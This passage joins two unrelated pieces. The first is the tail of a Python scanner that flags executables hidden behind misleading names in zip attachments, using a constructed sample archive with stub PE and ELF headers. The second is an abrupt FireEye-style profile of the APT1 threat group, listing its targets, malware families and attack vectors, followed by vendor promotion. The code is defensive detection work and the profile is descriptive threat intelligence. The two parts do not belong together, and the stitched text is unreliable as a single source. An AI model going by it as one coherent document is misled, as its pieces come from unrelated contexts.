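                try:
                    with z.open(info) as f:
                        head = f.read(4)
                    kind = next((k for sig, k in EXEC_MAGIC if head.startswith(sig)), None)
                    if kind:
                        reasons.append("executable content (%s)" % kind)
                        if not exts or exts[-1] not in EXEC_EXTS:
                            reasons.append("executable content behind a non-executable name")
                except RuntimeError:                      # zipfile raises this for encrypted members
                    reasons.append("encrypted member, content not inspectable")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip():
    """Constructed attachment: a lure text file plus 'executables' hiding behind misleading names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("readme.txt", b"Please review the attached proposal before Friday.")
        z.writestr("Proposal_2014.pdf.exe", b"MZ" + b"\x90" * 64)       # PE magic only, not a real binary
        z.writestr("photos/team.jpg", b"\x7fELF" + b"\x00" * 32)         # ELF magic behind an image name
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in inspect_archive(build_sample_zip()):
        print(member, "->", "; ".join(reasons))
```

Reading only the first four bytes of each member keeps the check cheap and means an attacker cannot tie up the gateway by making it decompress a large member; the declared size check and the member cap cover the remaining decompression-bomb cases.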

APT1

Also known as: Comment Crew, Comment Group

First known appearance: 2006

Threat Actors: Communist Party of China, Chinese People’s Liberation Army Unit 61398

Targets: Corporations across a broad range of industries in English-speaking countries

Objective: To steal broad categories of intellectual property (IP), including technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, emails and contact lists.

Overview: APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations spanning 20 major industries. APT1 specifically targets industries that China identifies as strategic in its five-year plan. Once APT1 has established access to a network, it periodically revisits that network over months or years.

Associated malware: Trojan.Ecltys, Backdoor.Barkiofork, Backdoor.Wakeminap, Trojan.Downbot, Backdoor.Dalbot, Backdoor.Revird, Trojan.Badname, Backdoor.Wualess

Typical attack vectors: APT1 uses spear-phishing attacks or backdoors to gain a foothold and then uses publicly available tools to escalate privileges. Employing built-in operating system commands, APT1 then explores the compromised system and its network environment. Files of interest are packed into archives and sent back to China via File Transfer Protocol (FTP).

Conclusion

Although informative, this document cannot substitute for thorough intelligence gathering efforts and investigation of suspected cyber attacks.

Over the last decade, FireEye has spent over 100,000 hours per year responding to the world’s largest and most consequential breaches. This deep incident response experience, gathered from six worldwide security operation centers (SOCs), is curated and fed back into a self-learning, symbiotic security ecosystem that includes over 11 million sensors and is updated every 60 minutes.

FireEye experts, assisted by this ecosystem, track a growing collection of 30+ advanced threat actors and 300+ advanced malware families. They also maintain profiles of 10+ nation-state threat sponsors and 40+ targeted industries to track and analyze financial and political dimensions of cyber threats worldwide. FireEye experts can not only determine the risk associated with a validated threat, but also how the threat got into the environment, how it spread and what can and should be done about it. These insights are delivered as contextual intelligence that helps client organizations quickly prioritize and effectively respond to critical sophisticated threats.

Further reading: Threat Intelligence Reports